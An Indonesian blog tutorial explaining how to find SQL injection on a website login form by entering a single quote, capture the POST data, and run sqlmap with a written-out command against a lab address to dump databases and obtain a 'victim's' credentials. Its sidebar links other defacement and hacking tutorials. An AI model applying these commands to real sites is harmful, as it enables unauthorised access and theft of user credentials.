• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

SQL Injection pada Halaman Login

June 16, 2016 by Jack Wilder 3 Comments

Sebenarnya ini teknik lama namun saya share barangkali ada yang belum tau. SQL Injection sendiri bisa dilakukan di halaman login pada target yang vuln terhadap sqli post data.

Saat kalian megakses halaman login sebuah situs coba masukkan petik satu ( ‘ ) di kolom username atau password nya. Nah jika kalian mendapat error seperti ss diatas maka sqli bisa dilakukan.
Kita gunakan addons HTTP Headers pada firefox untuk meng-capture post data yang terdapat pada halaman login tersebut.
Seperti ss diatas,
Vuln terdapat pada :
http://192.168.48.143/checklogin.php
Dengan post data sebagai berikut :
myusername=linuxsec&mypassword=%27&Submit=Login
Disini saya coba melakukan injeksi dengan SQLmap.
Command nya sebagai berikut :
sqlmap -u "url" --data="post data" --dbs
Contoh :
sqlmap -u http://192.168.48.143/checklogin.php --data="myusername=linuxsec&mypassword=%27&Submit=Login" --dbs
Dan biarkan SQLmap melakukan injeksi otomatis.
Selanjutnya tinggal masukkan command basic SQLmap sampai kita mendapat username dan password victim.
Oke sekian tutor singkat kali ini, semoga bermanfaat.

Filed Under: SQL Injection Tagged With: Hacking, Linux, Security

Reader Interactions

Comments

  1. Anonim says

    June 16, 2016 at 10:08 am

    nyimak mastah

    Reply
  2. Ginggo binggo says

    September 5, 2016 at 9:12 am

    Kalo mau belajar dari pertama dimana ya postnya min?

    Reply
  3. GalangX says

    April 20, 2020 at 11:30 pm

    Kalo di android pake apa ya buat post data SQL Injection

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Shopify Custom Domain or Subdomain Takeover

Cara Deface dengan Exploit Slims CMS Senayan Arbitrary File Upload Vulnerability

Tutorial Deface Menutup Halaman Depan Situs Target dengan JS Overlay

MIME Type Sniffing pada Form Upload Gambar

RCE pada Redis via Master-Slave Replication

Cara Mudah Hack cPanel dengan Fitur Reset Password

bWAPP Remote File Inclusion Medium Security Level

WordPress Plugin CopySafe PDF Protection Shell Upload

Heroku Custom Domain or Subdomain Takeover

Exploit WordPress Plugin WP Mobile Edition Local File Disclosure Vulnerability

LinuxSec / 12 queries in 0.10 seconds